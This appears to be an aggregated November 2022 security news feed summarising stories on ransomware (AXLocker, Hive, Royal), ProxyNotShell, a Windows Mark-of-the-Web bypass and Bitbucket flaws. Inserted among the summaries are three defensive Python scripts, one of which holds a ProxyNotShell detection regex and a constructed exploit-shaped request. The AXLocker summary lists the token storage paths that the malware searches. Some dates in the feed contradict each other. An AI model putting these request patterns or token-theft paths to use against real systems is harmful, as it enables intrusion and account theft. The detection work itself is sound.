                Autosummary: [Image: Files encrypted by the Donut Ransomware. Source: BleepingComputer] The Donut Leaks operation has a flair for theatrics, using interesting graphics, a bit of humor, and even offering a builder for an executable that acts as a gateway to their Tor data leak site.


                Hackers breach energy orgs via bugs in discontinued web server

                exploits industry
                2022-11-22 https://www.bleepingcomputer.com/news/security/hackers-breach-energy-orgs-via-bugs-in-discontinued-web-server/
                Microsoft said today that security vulnerabilities found to impact a web server discontinued since 2005 have been used to target and compromise organizations in the energy sector. [...]

                Autosummary: "To achieve this, the group likely compromised and co-opted internet-facing DVR/IP camera devices for command and control (C2) of Shadowpad malware infections, as well as use of the open source tool FastReverseProxy." Attacks linked to Boa web server flaws: while Recorded Future didn't expand on the attack vector, Microsoft said today that the attackers exploited a vulnerable component in the Boa web server, a software solution discontinued since 2015 that's still being used by IoT devices (from routers to cameras).


                Wipro launches cybersecurity consulting offering for businesses across Europe

                ciber
                2022-11-22 https://www.helpnetsecurity.com/2022/11/23/wipro-cybersecurity-consulting-offering/

                Wipro has launched a strategic cybersecurity consulting offering in Europe. The announcement comes on the heels of a series of acquisitions in the consulting space—Edgile, Capco, and Ampion—and is part of the firm’s vision to build a global cybersecurity consulting offering to help clients stay ahead of a dynamic threat and regulatory environment. “Escalation of cyber threats, compounded by the rapidly changing regulatory environment, is creating brand new challenges for businesses across Europe,” said Tony … More

                The post Wipro launches cybersecurity consulting offering for businesses across Europe appeared first on Help Net Security.

                "

                Autosummary: "


                5 API Vulnerabilities That Get Exploited by Criminals

                exploits
                2022-11-22 https://securityaffairs.co/wordpress/138879/security/5-api-vulnerabilities.html

                Let’s take a look at API vulnerabilities by reading the API Security Top 10 published by the Open Web Application Security Project (OWASP). It’s no secret that cyber security has become a leading priority for most organizations — especially those in industries that handle sensitive customer information. And as these businesses work towards building robust […]

                The post 5 API Vulnerabilities That Get Exploited by Criminals appeared first on Security Affairs.

                "

                Autosummary: Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share OnThese include incomplete configurations, misconfigured HTTP headers, verbose error messages, open cloud storage, and more. When it comes to traditional security methods, they often lack the ability to track traffic over time, meaning they can’t easily identify high-volume attacks like credential stuffing. "


                Future-proofing asset and vulnerability intelligence in response to CISA’s BOD 23-01

                exploits
                2022-11-21 https://www.helpnetsecurity.com/2022/11/21/asset-discovery/

                Modern environments have become more dynamic and the need for equally progressive asset discovery techniques has intensified. The new Cybersecurity and Infrastructure Security Agency (CISA) Binding Operational Directive (BOD) 23-01 recognizes this fact. What is BOD 23-01? While it is only binding for US federal civilian agencies, the directive emphasizes the foundational asset discovery and intelligence capabilities all organizations must possess to be prepared for modern threats. Without the critical insight these capabilities provide, the … More

                The post Future-proofing asset and vulnerability intelligence in response to CISA’s BOD 23-01 appeared first on Help Net Security.

                "

                Autosummary: Modern IT infrastructure approaches are increasingly complex, with software defined networks, hyper-segmentation, widespread adoption of multi-public cloud infrastructures, containerization, and the democratization of responsibility – and discovering new IP assets can seem futile.The scope of these scans is expansive, to include any IP connected device: a traditional desktop or server, network gear, video cameras, roaming devices, etc. 1. Agree on a common, inclusive definition of asset The legacy definition of a compute asset is no longer relevant, as the adversary’s line of sight extends far beyond IT devices. By accessing, aggregating, and correlating asset intelligence from across these existing sources, organizations can synthesize a comprehensive view of their cyber estate – a view that includes a great deal more context and which can be invaluable in a wide range of cybersecurity scenarios. 3. Gather a continuous, multidimensional view of each asset While siloed data sources can cause confusion during the asset management lifecycle, they can be extremely powerful when combined. "


                5 free resources from the Cybersecurity and Infrastructure Security Agency (CISA)

                ciber
                2022-11-21 https://www.helpnetsecurity.com/2022/11/21/5-free-resources-cybersecurity-and-infrastructure-security-agency-cisa/

                The Cybersecurity and Infrastructure Security Agency (CISA) is an agency of the United States Department of Homeland Security. CISA is in charge of enhancing cybersecurity and infrastructure protection at all levels of government, coordinating cybersecurity initiatives with U.S. states, and enhancing defenses against cyberattacks. To assist businesses in enhancing their security capabilities, CISA offers free cybersecurity products and services. Cyber Hygiene Vulnerability Scanning You can register for this service by emailing vulnerability@cisa.dhs.gov. Scanning will start … More

                The post 5 free resources from the Cybersecurity and Infrastructure Security Agency (CISA) appeared first on Help Net Security.

                "

                Autosummary: Checklist for implementing cybersecurity measures This document outlines four goals for your organization: Reducing the likelihood of a damaging cyber incident Detecting malicious activity quickly Responding effectively to confirmed incidents Maximizing resilience. "


                Octocrypt, Alice, and AXLocker Ransomware, new threats in the wild

                exploits ransomware
                2022-11-21 https://securityaffairs.co/wordpress/138783/malware/octocrypt-alice-axlocker-ransomware.html

                Experts from Cyble Research and Intelligence Labs (CRIL) discovered three new ransomware families: AXLocker, Octocrypt, and Alice Ransomware. Threat intelligence firm Cyble announced the discovery of three new ransomware families named AXLocker, Octocrypt, and Alice Ransomware. The AXLocker ransomware encrypts victims’ files and steals Discord tokens from the infected machine. The analysis of the code […]

                The post Octocrypt, Alice, and AXLocker Ransomware, new threats in the wild appeared first on Security Affairs.

                "

                Autosummary: “After encrypting the victim’s files, the ransomware collects and sends sensitive information such as Computer name, Username, Machine IP address, System UUID, and Discord tokens to TA.” reads the analysis published by Cyble. "


                Notorious Emotet Malware Returns With High-Volume Malspam Campaign

                exploits
                2022-11-21 https://thehackernews.com/2022/11/notorious-emotet-malware-returns-with.html
                The notorious Emotet malware has returned with renewed vigor as part of a high-volume malspam campaign designed to drop payloads like IcedID and Bumblebee. "Hundreds of thousands of emails per day" have been sent since early November 2022, enterprise security company Proofpoint said last week, adding, "the new activity suggests Emotet is returning to its full functionality acting as a delivery

                Autosummary: Among the primary countries targeted are the U.S., the U.K., Japan, Germany, Italy, France, Spain, Mexico, and Brazil.


                Black Friday deal: 50% off Malwarebytes Premium + Privacy VPN bundle

                exploits
                2022-11-21 https://www.bleepingcomputer.com/news/security/black-friday-deal-50-percent-off-malwarebytes-premium-plus-privacy-vpn-bundle/
                Malwarebytes" Black Friday deal is now live, offering a 50% discount on the Malwarebytes Premium antivirus + Malwarebytes Privacy VPN bundle until November 28th. [...] "

                Autosummary: "


                Daixin Ransomware Gang Steals 5 Million AirAsia Passengers' and Employees' Data

                exploits ransomware
                2022-11-21 https://thehackernews.com/2022/11/daixin-ransomware-gang-steals-5-million.html
                The cybercrime group called Daixin Team has leaked sample data belonging to AirAsia, a Malaysian low-cost airline, on its data leak portal. The development comes a little over a week after the company fell victim to a ransomware attack on November 11 and 12, per DataBreaches.net. The threat actors allegedly claim to have obtained the personal data associated with five million


                Aurora infostealer malware increasingly adopted by cybergangs

                exploits ciber
                2022-11-21 https://www.bleepingcomputer.com/news/security/aurora-infostealer-malware-increasingly-adopted-by-cybergangs/
                Cybercriminals are increasingly turning to a new Go-based information stealer named "Aurora" to steal sensitive information from browsers and cryptocurrency apps, exfiltrate data directly from disks, and load additional payloads. [...]

                Autosummary: The highlight features listed in the promotional posts are: polymorphic compilation that doesn’t require crypter wrapping; server-side data decryption; targets over 40 cryptocurrency wallets; automatic seed phrase deduction for MetaMask; reverse lookup for password collection; runs on TCP sockets; communicates with C2 only once, during license check; fully native small payload (4.2 MB) requiring no dependencies. The above features are geared towards high-level stealthiness, which is the main advantage of Aurora over other popular info-stealers.


                Expert published PoC exploit code for macOS sandbox escape flaw

                exploits
                2022-11-21 https://securityaffairs.co/wordpress/138815/hacking/macos-sandbox-escape-flaw.html

                A researcher published details and proof-of-concept (PoC) code for a high-severity macOS sandbox escape vulnerability tracked as CVE-2022-26696. Researcher Wojciech Reguła (@_r3ggi) of SecuRing published technical details and proof-of-concept (PoC) code for a macOS sandbox escape vulnerability tracked as CVE-2022-26696 (CVSS score of 7.8). In a wrap-up published by Reguła, the researcher observed that the problem is caused […]

                The post Expert published PoC exploit code for macOS sandbox escape flaw appeared first on Security Affairs.

                "

                Autosummary: Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Black Friday deal: Get 50% off Malwarebytes Premium, Privacy VPN

                exploits
                2022-11-21 https://www.bleepingcomputer.com/news/security/black-friday-deal-get-50-percent-off-malwarebytes-premium-privacy-vpn/
                Malwarebytes" Black Friday deal is now live, offering a 50% discount on the Malwarebytes Premium antivirus + Malwarebytes Privacy VPN bundle until November 28th. [...] "

                Autosummary: "


                Week in review: 5 Kali Linux tools, Spotify’s Backstage vulnerability, Cybertech NYC 2022

                exploits
                2022-11-20 https://www.helpnetsecurity.com/2022/11/20/week-in-review-5-kali-linux-tools-spotifys-backstage-vulnerability-cybertech-nyc-2022/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: As trust in online spaces degrades, Canada bolsters resilience against cyber attacks In this Help Net Security interview, Sami Khoury, Head of the Canadian Centre for Cyber Security, talks about how Canada is addressing today’s top threats, touches upon his long career and offers tips for those new to the industry. Russian hacktivists hit Ukrainian orgs with ransomware – but … More

                The post Week in review: 5 Kali Linux tools, Spotify’s Backstage vulnerability, Cybertech NYC 2022 appeared first on Help Net Security.


Autosummary: New infosec products of the week: November 18, 2022 Here’s a look at the most interesting products from the past week, featuring releases from Abnormal Security, Bearer, Clumio, Cohesity, ForgeRock, Keyo, LOKKER, and SecureAuth. Why companies can no longer hide keys under the doormat For good reason, companies trust in encryption, blockchain, zero trust access, distributed or multi-party strategies, and other core technologies.


                New ransomware encrypts files, then steals your Discord account

                exploits ransomware
                2022-11-20 https://www.bleepingcomputer.com/news/security/new-ransomware-encrypts-files-then-steals-your-discord-account/
The new "AXLocker" ransomware family is not only encrypting victims' files and demanding a ransom payment but also stealing the Discord accounts of infected users. [...]

Autosummary: To steal the Discord token, AxLocker scans the following directories and extracts tokens using regular expressions:
• Discord\Local Storage\leveldb
• discordcanary\Local Storage\leveldb
• discordptb\leveldb
• Opera Software\Opera Stable\Local Storage\leveldb
• Google\Chrome\User Data\Default\Local Storage\leveldb
• BraveSoftware\Brave-Browser\User Data\Default\Local Storage\leveldb
• Yandex\YandexBrowser\User Data\Default\Local Storage\leveldb
[Image: AXLocker's grab function (source: Cyble)] Eventually, victims are served a pop-up window containing the ransom note, informing them that their data was encrypted and how to contact the threat actor to purchase a decryptor.


                PoC exploit code for ProxyNotShell Microsoft Exchange bugs released online

                exploits
                2022-11-20 https://securityaffairs.co/wordpress/138768/hacking/proxynotshell-microsoft-exchange-poc.html

Proof-of-concept exploit code has been released online for two actively exploited vulnerabilities in Microsoft Exchange, known as ProxyNotShell. The two flaws, CVE-2022-41040 and CVE-2022-41082, impact Exchange Server 2013, 2016, and 2019; an authenticated attacker can trigger them to elevate privileges and run PowerShell […]

                The post PoC exploit code for ProxyNotShell Microsoft Exchange bugs released online appeared first on Security Affairs.


Autosummary: The two flaws are:
• CVE-2022-41040 – Microsoft Exchange Server Elevation of Privilege Vulnerability
• CVE-2022-41082 – Microsoft Exchange Server Remote Code Execution Vulnerability
They impact Exchange Server 2013, 2016, and 2019; an authenticated attacker can trigger them to elevate privileges to run PowerShell in the context of the system and gain arbitrary or remote code execution on vulnerable servers.
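A practical check to run while the November 2022 Exchange updates are still rolling out is a scan of IIS logs for requests shaped like the ProxyNotShell chain. The script below is an added example, not code from the Security Affairs article or from Microsoft; its match condition copies the one in Microsoft's published URL Rewrite mitigation for CVE-2022-41040 (a request URI containing both "autodiscover.json" and "powershell", case-insensitive). The log lines are constructed: the columns follow the default IIS W3C layout declared by the #Fields header, and the query strings are illustrative rather than a reproduction of the exploit.

```python
"""Flag ProxyNotShell-style requests in IIS W3C extended log files.

Added example; not code from the article. The match logic copies Microsoft's
URL Rewrite mitigation for CVE-2022-41040: any request URI containing both
"autodiscover.json" and "powershell" (case-insensitive). The sample log is
constructed; its query strings are illustrative only.
"""
import re
from typing import Dict, Iterable, Iterator, List

# Same condition as the mitigation rule: both tokens anywhere in the URI.
PROXYNOTSHELL_RE = re.compile(r"(?=.*autodiscover\.json)(?=.*powershell)", re.IGNORECASE)


def parse_w3c(lines: Iterable[str]) -> Iterator[Dict[str, str]]:
    """Yield one dict per request, naming columns from the latest #Fields header."""
    fields: List[str] = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split()  # IIS URL-encodes spaces, so whitespace is a safe delimiter
        if len(values) != len(fields):
            continue  # truncated or foreign line: skip rather than misalign columns
        yield dict(zip(fields, values))


def request_uri(req: Dict[str, str]) -> str:
    """Rebuild stem?query as the rewrite rule sees it ('-' means no query string)."""
    query = req.get("cs-uri-query", "-")
    stem = req.get("cs-uri-stem", "")
    return stem if query == "-" else f"{stem}?{query}"


def find_proxynotshell(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return the parsed requests whose URI satisfies the mitigation pattern."""
    hits = []
    for req in parse_w3c(lines):
        uri = request_uri(req)
        if PROXYNOTSHELL_RE.search(uri):
            hits.append({**req, "uri": uri})
    return hits


# Constructed sample: two ordinary Exchange requests and one matching request.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2022-11-18 10:01:02 10.0.0.5 POST /owa/auth.owa - 443 - 203.0.113.10 302
2022-11-18 10:01:09 10.0.0.5 POST /autodiscover/autodiscover.xml - 443 - 203.0.113.10 401
2022-11-18 10:02:11 10.0.0.5 POST /autodiscover/autodiscover.json @example.test/powershell/?Email=autodiscover/autodiscover.json%3F@example.test 443 - 198.51.100.7 200
""".splitlines()

if __name__ == "__main__":
    for hit in find_proxynotshell(SAMPLE_LOG):
        print(hit["date"], hit["time"], hit["c-ip"], hit["cs-method"], hit["uri"])
```

Point it at the W3C logs under the Default Web Site's log directory; a hit from an external client IP is worth a full investigation of that host, since the same pattern is what the rewrite-rule mitigation blocks. The rule is a stopgap only: the November 2022 Exchange security updates fix both CVEs.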


                Chinese "Mustang Panda" Hackers Actively Targeting Governments Worldwide

                government
                2022-11-19 https://thehackernews.com/2022/11/chinese-mustang-panda-hackers-actively.html
A notorious advanced persistent threat actor known as Mustang Panda has been linked to a spate of spear-phishing attacks targeting government, education, and research sectors across the world. The primary targets of the intrusions from May to October 2022 included countries in the Asia Pacific region such as Myanmar, Australia, the Philippines, Japan, and Taiwan, cybersecurity firm Trend Micro

Autosummary: Activities of the group chronicled by ESET, Google, Proofpoint, Cisco Talos, and Secureworks this year have revealed the threat actor's pattern of using PlugX (and its variant called Hodur) to infect a wide range of entities in Asia, Europe, the Middle East, and the Americas.


                Microsoft Warns of Hackers Using Google Ads to Distribute Royal Ransomware

                exploits ransomware
                2022-11-19 https://thehackernews.com/2022/11/microsoft-warns-of-hackers-using-google.html
                A developing threat activity cluster has been found using Google Ads in one of its campaigns to distribute various post-compromise payloads, including the recently discovered Royal ransomware. Microsoft, which spotted the updated malware delivery method in late October 2022, is tracking the group under the name DEV-0569. "Observed DEV-0569 attacks show a pattern of continuous innovation, with "



                Indian Government Publishes Draft of Digital Personal Data Protection Bill 2022

                government
                2022-11-19 https://thehackernews.com/2022/11/indian-government-publishes-draft-of.html
The Indian government on Friday released a draft version of the much-awaited data protection regulation, making it the fourth such effort since it was first proposed in July 2018. The Digital Personal Data Protection Bill, 2022, as it's called, aims to secure personal data, while also seeking users' consent in what the draft claims is "clear and plain language" describing the exact kinds of

Autosummary: The legislation, in its current form, requires companies (i.e., data processors) to follow sufficient security safeguards to protect user information, alert users in the event of a data breach, and stop retaining users' data should individuals opt to delete their accounts.


                New attacks use Windows security bypass zero-day to drop malware

                exploits
                2022-11-19 https://www.bleepingcomputer.com/news/security/new-attacks-use-windows-security-bypass-zero-day-to-drop-malware/
New phishing attacks use a Windows zero-day vulnerability to drop the Qbot malware without displaying Mark of the Web security warnings. [...]

Autosummary: When files are downloaded from an untrusted remote location, such as the Internet or an email attachment, Windows adds a special attribute to the file called the Mark of the Web. This Mark of the Web (MoTW) is an alternate data stream that contains information about the file, such as the URL security zone the file originates from, its referrer, and its download URL. [Image: mounted IMG file (source: BleepingComputer)] The JS file contains VBScript that reads the data.txt file, which contains the "vR32" string, and appends the contents to the parameter of the ShellExecute command to load the "port/resemblance.tmp" DLL file.
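The MoTW stream described above has a small, fixed layout, and the whole bypass hinges on files inside a mounted IMG not having one. The parser below is an added example, not code from the BleepingComputer article; it reads the Zone.Identifier text ([ZoneTransfer] section with ZoneId, ReferrerUrl and HostUrl keys, the format Windows writes), classifies the zone, and treats an absent stream as the "no warning" case. The sample stream contents are constructed.

```python
"""Parse and classify a Windows Mark-of-the-Web (MoTW) Zone.Identifier stream.

Added example; not code from the article. The stream layout ([ZoneTransfer]
section with ZoneId, ReferrerUrl and HostUrl keys) is the format Windows writes;
the sample stream below is constructed.
"""
import configparser
from dataclasses import dataclass
from typing import Optional

# Windows URL security zones as stored in ZoneId.
ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}
# Zones for which Windows shows the "this file came from another computer" warnings.
UNTRUSTED_ZONES = {3, 4}


@dataclass
class MarkOfTheWeb:
    zone_id: int
    referrer_url: Optional[str]
    host_url: Optional[str]

    @property
    def zone_name(self) -> str:
        return ZONE_NAMES.get(self.zone_id, f"Unknown({self.zone_id})")

    @property
    def untrusted(self) -> bool:
        return self.zone_id in UNTRUSTED_ZONES


def parse_zone_identifier(stream: str) -> MarkOfTheWeb:
    """Parse the text of a file's Zone.Identifier alternate data stream.

    Raises ValueError if the [ZoneTransfer] section or the ZoneId key is missing.
    """
    parser = configparser.ConfigParser(interpolation=None)  # URLs may contain '%'
    parser.optionxform = str  # keep key case exactly as Windows writes it
    parser.read_string(stream.replace("\r\n", "\n"))
    if "ZoneTransfer" not in parser:
        raise ValueError("missing [ZoneTransfer] section")
    section = parser["ZoneTransfer"]
    if "ZoneId" not in section:
        raise ValueError("missing ZoneId")
    return MarkOfTheWeb(
        zone_id=int(section["ZoneId"]),
        referrer_url=section.get("ReferrerUrl"),
        host_url=section.get("HostUrl"),
    )


def motw_status(stream: Optional[str]) -> str:
    """Classify a file by its Zone.Identifier stream, or by the stream's absence.

    The absent case is the one abused in the attack above: files inside a mounted
    IMG/ISO carry no MoTW, so Windows raises no warning when they are launched.
    """
    if stream is None:
        return "no MoTW: no warning would be shown"
    motw = parse_zone_identifier(stream)
    verdict = "warning expected" if motw.untrusted else "trusted zone"
    return f"MoTW zone {motw.zone_id} ({motw.zone_name}): {verdict}"


# Constructed sample: what a browser writes for a download from the Internet zone.
SAMPLE_INTERNET_DOWNLOAD = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.test/download\r\n"
    "HostUrl=https://cdn.example.test/archive.img\r\n"
)

if __name__ == "__main__":
    print(motw_status(SAMPLE_INTERNET_DOWNLOAD))
    print(motw_status(None))  # a file pulled from inside the mounted IMG
```

On a Windows host the stream text to feed into parse_zone_identifier comes from `Get-Content .\archive.img -Stream Zone.Identifier` in PowerShell (or `dir /R` to list which files carry one). Checking the downloaded container rather than the files extracted from it is the point: the IMG itself is marked, the JS and DLL inside it are not.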


                DEV-0569 group uses Google Ads to distribute Royal Ransomware

                exploits ransomware
                2022-11-19 https://securityaffairs.co/wordpress/138750/malware/dev-0569-google-ads-royal-ransomware.html

Researchers from the Microsoft Security Threat Intelligence team warn that a threat actor tracked as DEV-0569 is using Google Ads to distribute various payloads, including the recently discovered Royal ransomware. The DEV-0569 group carries out […]

                The post DEV-0569 group uses Google Ads to distribute Royal Ransomware appeared first on Security Affairs.


Autosummary: From August to October 2022, DEV-0569 attempted to spread BATLOADER via malicious links in phishing emails, posing as legitimate installers for multiple popular applications, including TeamViewer, Adobe Flash Player, Zoom, and AnyDesk.


                Cybersecurity implications of using public cloud platforms

                ciber
                2022-11-18 https://www.helpnetsecurity.com/2022/11/18/cybersecurity-implications-using-public-cloud-platforms-video/

                According to a recent Node4 report, IT managers have a generally positive view of public cloud platforms. Half of the respondents said that, despite benefits, they have had to migrate a workload back off a public cloud platform — and called out several potential shortcomings that could be behind this trend: 56% said their public cloud environment was more expensive to operate than initially forecast 22% identified service issues or capacity constraints 21% reported a … More

                The post Cybersecurity implications of using public cloud platforms appeared first on Help Net Security.



                Transportation sector targeted by both ransomware and APTs

                exploits ransomware
                2022-11-18 https://www.helpnetsecurity.com/2022/11/18/cybersecurity-trends-q3-2022/

                Trellix released The Threat Report: Fall 2022 from its Advanced Research Center, which analyzes cybersecurity trends from the third quarter (Q3) of 2022. The report includes evidence of malicious activity linked to ransomware and nation-state backed advanced persistent threat (APT) actors. It examines malicious cyberactivity including threats to email, the malicious use of legitimate third-party security tools, and more. Q3 cybersecurity trends US ransomware activity leads the pack: In the US alone, ransomware activity increased … More

                The post Transportation sector targeted by both ransomware and APTs appeared first on Help Net Security.


Autosummary: Emerging threat actors scaled: The China-linked threat actor Mustang Panda had the most detected threat indicators in Q3, followed by Russia-linked APT29 and Pakistan-linked APT36.


                China-based Fangxiao group behind a long-running phishing campaign

                financial
                2022-11-18 https://securityaffairs.co/wordpress/138683/cyber-crime/fangxiao-phishing-campaign.html

                A China-based financially motivated group, tracked as Fangxiao, is behind a large-scale phishing campaign dating back as far as 2019. Researchers from Cyjax reported that a China-based financially motivated group, dubbed Fangxiao, orchestrated a large-scale phishing campaign since 2017. The sophisticated phishing campaign exploits the reputation of international brands and targets businesses in multiple industries, including […]

                The post China-based Fangxiao group behind a long-running phishing campaign appeared first on Security Affairs.



                Hive Ransomware Attackers Extorted $100 Million from Over 1,300 Companies Worldwide

                exploits ransomware
                2022-11-18 https://thehackernews.com/2022/11/hive-ransomware-attackers-extorted-100.html
The threat actors behind the Hive ransomware-as-a-service (RaaS) scheme have launched attacks against over 1,300 companies across the world, netting the gang $100 million in illicit payments as of November 2022. "Hive ransomware has targeted a wide range of businesses and critical infrastructure sectors, including government facilities, communications, critical manufacturing, information


                Atlassian fixes critical command injection bug in Bitbucket Server

                exploits
                2022-11-18 https://www.bleepingcomputer.com/news/security/atlassian-fixes-critical-command-injection-bug-in-bitbucket-server/
Atlassian has released updates to address critical-severity vulnerabilities in its centralized identity management platform, Crowd Server and Data Center, and in Bitbucket Server and Data Center, the company's solution for Git repository management. [...]

Autosummary: The versions that fix the problem are:
• 7.6.19 or newer
• 7.17.12 or newer
• 7.21.6 or newer
• 8.0.5 or newer
• 8.1.5 or newer
• 8.2.4 or newer
• 8.3.3 or newer
• 8.4.2 or newer
• 8.5.0 or newer
Users unable to upgrade to a fixed version should disable "Public Signup", which forces an attacker to authenticate with valid credentials and so reduces the risk of exploitation.
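Because the fix is backported per maintenance branch, "am I patched?" is not a simple greater-than comparison: 7.21.6 is fixed while 8.0.4 is not. The checker below is an added example, not code from the BleepingComputer article or from Atlassian. It encodes exactly the Bitbucket fixed releases listed above; the assumption that a 7.x/8.x branch with no listed fix (for example 7.20.x) has no patch of its own and must move to a listed branch is mine, not the vendor's, and the Crowd fix is not covered.

```python
"""Check a Bitbucket Server / Data Center version against the fixed releases listed above.

Added example; not code from the article or from Atlassian. FIXED_PATCH holds the
releases the article lists. Assumption (mine, not the vendor's): branches without a
listed fix have no patched release and should move to the first fully fixed line.
"""
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# Minimum fixed patch level per maintained branch: (major, minor) -> patch.
FIXED_PATCH = {
    (7, 6): 19,
    (7, 17): 12,
    (7, 21): 6,
    (8, 0): 5,
    (8, 1): 5,
    (8, 2): 4,
    (8, 3): 3,
    (8, 4): 2,
}
# Every release from this point on is fixed ("8.5.0 or newer").
FIXED_FROM: Version = (8, 5, 0)


def parse_version(text: str) -> Version:
    """Parse 'major.minor[.patch]' into a tuple; a '-suffix' (e.g. '-rc1') is ignored."""
    core = text.strip().split("-")[0]
    parts = core.split(".")
    if not 2 <= len(parts) <= 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version string: {text!r}")
    nums = [int(p) for p in parts] + [0] * (3 - len(parts))
    return nums[0], nums[1], nums[2]


def fix_status(text: str) -> Tuple[bool, Optional[str]]:
    """Return (is_fixed, recommended_upgrade).

    recommended_upgrade is the nearest fixed release on the same branch when the
    branch has one, otherwise the first fully fixed line; None when already fixed.
    """
    major, minor, patch = parse_version(text)
    if (major, minor, patch) >= FIXED_FROM:
        return True, None
    branch = (major, minor)
    if branch in FIXED_PATCH:
        needed = FIXED_PATCH[branch]
        if patch >= needed:
            return True, None
        return False, f"{major}.{minor}.{needed}"
    # Assumption: no backported fix on this branch, so jump to the fully fixed line.
    return False, "%d.%d.%d" % FIXED_FROM


def is_fixed(text: str) -> bool:
    return fix_status(text)[0]


if __name__ == "__main__":
    for v in ("7.21.5", "7.21.6", "7.20.3", "8.4.1", "8.6.0"):
        fixed, upgrade = fix_status(v)
        print(v, "fixed" if fixed else f"vulnerable, upgrade to {upgrade}")
```

The installed version is reported by Bitbucket Server's own REST API at `/rest/api/1.0/application-properties` (the `version` field), so the check can run across an estate without logging in to each host.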


                LodaRAT Malware Resurfaces with New Variants Employing Updated Functionalities

                exploits
                2022-11-18 https://thehackernews.com/2022/11/lodarat-malware-resurfaces-with-new.html
The LodaRAT malware has resurfaced with new variants that are being deployed in conjunction with other sophisticated malware, such as RedLine Stealer and Neshta. "The ease of access to its source code makes LodaRAT an attractive tool for any threat actor who is interested in its capabilities," Cisco Talos researcher Chris Neal said in a write-up published Thursday. Aside from being dropped


                Hive Ransomware extorted over $100M in ransom payments from over 1,300 companies

                exploits ransomware
                2022-11-18 https://securityaffairs.co/wordpress/138702/cyber-crime/hive-ransomware-extorted-100m.html

                Hive ransomware operators have extorted over $100 million in ransom payments from over 1,300 companies worldwide as of November 2022. The threat actors behind the Hive ransomware-as-a-service (RaaS) have extorted $100 million in ransom payments from over 1,300 companies worldwide as of November 2022, reported the U.S. cybersecurity and intelligence authorities. “As of November 2022, […]

                The post Hive Ransomware extorted over $100M in ransom payments from over 1,300 companies appeared first on Security Affairs.


Autosummary: The authorities reported that from June 2021 through at least November 2022, threat actors employed the Hive ransomware in attacks aimed at a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH).


                Chinese hackers use Google Drive to drop malware on govt networks

                exploits
                2022-11-18 https://www.bleepingcomputer.com/news/security/chinese-hackers-use-google-drive-to-drop-malware-on-govt-networks/
State-backed Chinese hackers launched a spearphishing campaign to deliver custom malware stored in Google Drive to government, research, and academic organizations worldwide. [...]

Autosummary: "Meanwhile, the real victims' addresses were written in the "CC" header, likely to evade security analysis and slow down investigations." – Trend Micro. Although the hackers used various malware loading routines, the process typically involved DLL side-loading after the victim launched an executable present in the archives.


                Photos: Cybersecurity marketers gather at Cyber Marketing Con 2022

                ciber
                2022-11-18 https://www.helpnetsecurity.com/2022/11/18/cyber-marketing-con-2022-photos/

                Help Net Security is attending Cybersecurity Marketing Society’s Cyber Marketing Con 2022 in Arlington, VA. Here’s a look at the event. Nathan Burke, CMO, Axonius Carmen Harris, Director, Product and Technology Communications, Sumo Logic Robin Campbell-Burt, CEO, Code Red Communications – Tanya Loh, Head of Marketing and Community, Forgepoint Capital – Melissa Goldberger, CMO, SafeBreach – Ryan Shopp, CMO, Deep Instinct – Michelle Schafer, SVP and Partner, Security Practice, Merritt Group Kaite Rosa, Sr. Director … More

                The post Photos: Cybersecurity marketers gather at Cyber Marketing Con 2022 appeared first on Help Net Security.



                Exploit released for actively abused ProxyNotShell Exchange bug

                exploits
                2022-11-18 https://www.bleepingcomputer.com/news/security/exploit-released-for-actively-abused-proxynotshell-exchange-bug/
Proof-of-concept exploit code has been released online for two actively exploited and high-severity vulnerabilities in Microsoft Exchange, collectively known as ProxyNotShell. [...]


                Researchers secretly helped decrypt Zeppelin ransomware for 2 years

                exploits ransomware
                2022-11-18 https://www.bleepingcomputer.com/news/security/researchers-secretly-helped-decrypt-zeppelin-ransomware-for-2-years/
Security researchers found vulnerabilities in the encryption mechanism of the Zeppelin ransomware and exploited them to create a working decryptor they have used since 2020 to help victim companies recover files without paying the attackers. [...]

Autosummary: [Image: retrieved public key in obfuscated form (source: Unit221b)] To overcome this final obstacle, Unit221b used a total of 800 central processing units (CPUs) in 20 servers, each with 40 CPUs.


                The Week in Ransomware - November 18th 2022 - Rising Operations

                exploits ransomware
                2022-11-18 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-18th-2022-rising-operations/
There have been some interesting developments in ransomware this week, with the arrest of a cybercrime ring leader and reports shedding light on two new but up-and-coming ransomware operations. [...]

Autosummary: Contributors and those who provided new ransomware information and stories this week include: @struppigel, @Ionut_Ilascu, @malwareforme, @malwrhunterteam, @DanielGallagher, @serghei, @jorntvdw, @fwosar, @LawrenceAbrams, @PolarToffee, @demonslay335, @FourOctets, @billtoulas, @VK_Intel, @BleepinComputer, @pcrisk, @Seifreed, @GeeksCyber, @BlackBerry, @ahnlab, and @MsftSecIntel. Finally, Ukraine says that a new Somnia ransomware is being used in attacks, CISA/FBI warned Iranian hackers breached a federal agency, and the FBI warned that Hive ransomware had made over $100 million in ransom payments.


                Smashing Security podcast #298: Housing market scams, Twitter 2FA, and the fesshole

                financial
                2022-11-17 https://grahamcluley.com/smashing-security-podcast-298/
Elon Musk is still causing chaos at Twitter (and it's beginning to impact users), are scammers selling your house without your permission, and Google gets stung with a record-breaking fine. All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Cyberwire's Dave Bittner.

Autosummary: Hosts: Graham Cluley – @gcluley; Carole Theriault – @caroletheriault. Guest: Dave Bittner – @bittner. Sponsored by Pentera – Pentera's Automated Security Validation Platform is designed to help teams increase their security posture against modern day threats across the entire attack surface.


                BitSight Third-Party Vulnerability Detection increases visibility into vendor risk

                exploits
